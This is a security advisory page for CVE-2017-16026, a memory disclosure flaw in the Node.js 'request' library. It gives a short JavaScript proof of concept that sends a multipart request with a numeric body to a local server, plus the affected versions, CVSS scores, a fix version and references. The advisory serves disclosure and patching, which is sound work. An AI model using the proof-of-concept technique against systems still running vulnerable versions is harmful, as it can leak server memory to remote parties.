CVE-2017-16026
MEDIUM5.9EPSS 1.1%Remote Memory Exposure in request
Description
Affected versions of `request` will disclose local system memory to remote systems in certain circumstances. When a multipart request is made, and the type of `body` is `number`, then a buffer of that size will be allocated and sent to the remote server as the body. ## Proof of Concept ```js var request = require('request'); var http = require('http'); var serveFunction = function (req, res){ req.on('data', function (data) { console.log(data) }); res.end(); }; var server = http.createServer(serveFunction); server.listen(8000); request({ method: "POST", uri: 'http://localhost:8000', multipart: [{body:500}] },function(err,res,body){}); ``` ## Recommendation Update to version 2.68.0 or later
Affected packages (2)
- Debian/node-requestfrom 0, < 2.88.1-1
- npm/request>= 2.49.0, < 2.68.0
CVSS scores
| Source | Version | Severity | Vector |
|---|---|---|---|
| osv | CVSS 3.1 | MEDIUM5.9 | CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N |
References (7)
- ADVISORYhttps://nvd.nist.gov/vuln/detail/CVE-2017-16026
- ADVISORYhttps://security-tracker.debian.org/tracker/CVE-2017-16026
- PATCHhttps://github.com/request/request
- WEBhttps://github.com/request/request/commit/29d81814bc16bc79cb112b4face8be6fc00061dd
- WEBhttps://github.com/request/request/issues/1904
- WEBhttps://github.com/request/request/pull/2018
- WEBhttps://github.com/request/request/pull/2022